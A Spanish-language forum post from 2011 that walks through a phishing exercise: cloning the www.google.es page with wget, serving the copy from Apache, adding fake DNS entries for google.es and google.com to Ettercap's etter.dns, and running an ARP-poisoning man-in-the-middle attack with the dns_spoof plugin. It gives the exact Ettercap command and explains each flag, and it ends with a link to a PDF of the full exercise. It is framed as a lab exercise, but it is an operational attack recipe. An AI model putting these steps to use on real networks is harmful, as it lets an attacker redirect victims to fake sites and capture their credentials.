Título: Redireccionar el tráfico de una página Web a una pagina falsa - phising Publicado por: SokarTefnut en 22 Marzo 2011, 10:24 am Para este ejercicio se falseará la página Web de www.google.es.
El primer paso será descargar la página original, para luego modificarla y cuando el equipo víctima intente acceder a www.google.es, la página que le será servida será la que yo he modificado. Desde el equipo atacante, Linux (Back-Trak 4.2 en este caso), se procede a la descarga de la página original, para ello utilizaremos wget (Fig. 6-1) Wget -r -d 3 www.google.es Las opciones utilizadas son: -r Para que realiza una descarga recursiva, con lo que intentará descargar el contenido De cada uno de los enlaces que se encuentren en dicha página y así con cualquier enlace encontrado, recursivamente. -d Para fijar la profundidad de la recursividad, solo voy a descargar 3 niveles de Enlaces en este ejercicio. Seguidamente consultamos el directorio por defecto para el servidor Web Apache, mirando el archivo: /etc/apache2/sites-available Como podemos observar en la imagen 6-2, el directorio por defecto es /var/www/ Modificaremos nuestra falsa página y la ubicaremos en el directorio señalado anteriormente y lanzamos el servidor Apache. Modificar el archivo /usr/share/ettercap/etter.dns, para crear las falsas resoluciones DNS que conduzcan a la victima hacia nuestro servidor Apache. (Fig. 6-4) Añadir nuestras falsas DNS: *.google.es A 172.30.2.100 *.google.com A 172.30.2.100 (Siendo 172.30.2.100 sea nuestra dirección IP) Lanzar ataque MITM con falsificación de DNS, para ello utilizamos Ettercap, modo consola: (Fig. 6-5) ettercap -q -T -M arp -P dns_spoof /172.30.2.129/ /172.30.2.131/ -n 255.255.255.0 -q modo silencioso, no imprime en pantalla los paquetes enviados -T Usado solo en modo texto -M Activa ataque MITM Arp método utilizado en el MITM (arp Poisoning, en este caso) -P Utilizar un plugging dns_spoof Éste es el plugin seleccionado /ip_addres/ Una de las IP para atacar /ip_addres/ la otra IP -n <netmask> Usado en caso de cambio de segmento de red,máscara El resultado del envenenamiento, desde el equipo cliente, al intentar acceder a la página www.google.es, éste será dirigido hacia la falsificación creada en el equipo atacante. Aqui está el ejercicio completo con imágenes y en Español: http://rapidshare.com/files/453789692/Direccionamiento_phising_WEB_SITE.pdf (http://rapidshare.com/files/453789692/Direccionamiento_phising_WEB_SITE.pdf) |